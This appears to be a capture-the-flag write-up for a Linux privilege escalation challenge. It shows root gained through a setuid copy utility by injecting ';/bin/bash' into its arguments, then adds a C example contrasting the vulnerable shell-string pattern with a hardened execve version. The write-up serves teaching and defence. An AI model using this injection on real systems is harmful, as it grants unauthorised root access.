🆙Linux PrivEsc
Location: Island of Misfit Toys: Ostrich Saloon
Objective Description
Find a method to escalate privileges inside this terminal and then run the binary in /root

Solution
While we enumerate for potential paths to elevate our privileges, we find a binary named "simplecopy" that has the setuid (SUID) bit set.


Because this binary has the setuid bit set, it will run with the privileges of its owner rather than those of the user who launches it. Since the owner is root, exploiting it may give us root privs.
elf@297f9110cc92:~$ /usr/bin/simplecopy
Usage: /usr/bin/simplecopy <source> <destination>
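It appears that it is indeed a simple copy utility. We find that we are able to inject commands into the arguments for this binary. Using this vulnerability, we can spawn a shell as root and run the binary specified in the objective to complete this challenge. In the output below, the cp error shows that the ";" ended the cp command after '/tmp/', and /bin/bash then ran as a separate command with the binary's root privileges.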
elf@297f9110cc92:~$ /usr/bin/simplecopy /tmp/ ";/bin/bash"
cp: missing destination file operand after '/tmp/'
Try 'cp --help' for more information.
root@297f9110cc92:~# whoami && id
root
uid=0(root) gid=0(root) groups=0(root),1000(elf)
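The source of simplecopy is not shown in this write-up; the cp error above suggests it pastes its arguments into a shell command line. The following is an added example (not the challenge's code) of that assumed pattern next to a shell-free replacement. The names build_shell_command and safe_copy are hypothetical.

```c
/* Added example: assumed shape of the bug, not simplecopy's real source. */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern (assumed): arguments are pasted into one shell string
 * that would then be handed to system(). Shell metacharacters in src or dst
 * become shell syntax. Returns the number of characters written. */
int build_shell_command(char *buf, size_t n, const char *src, const char *dst)
{
    return snprintf(buf, n, "cp %s %s", src, dst);
}

/* Hardened pattern: no shell is involved. Each argument is exactly one argv
 * entry, "--" ends option parsing, the environment is fixed, and the setuid
 * privileges are dropped first (assumes the tool does not need root to copy).
 * Returns cp's exit status, or -1 on fork/wait failure. */
int safe_copy(const char *src, const char *dst)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);                      /* refuse to run privileged */
        char *const argv[] = { "cp", "--", (char *)src, (char *)dst, NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
        execve("/bin/cp", argv, envp);
        _exit(127);                          /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "Usage: %s <source> <destination>\n", argv[0]);
        return 2;
    }
    return safe_copy(argv[1], argv[2]);
}
```

With the hardened form, a destination such as ";/bin/bash" is only ever a file name, so cp either writes to that path or fails.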
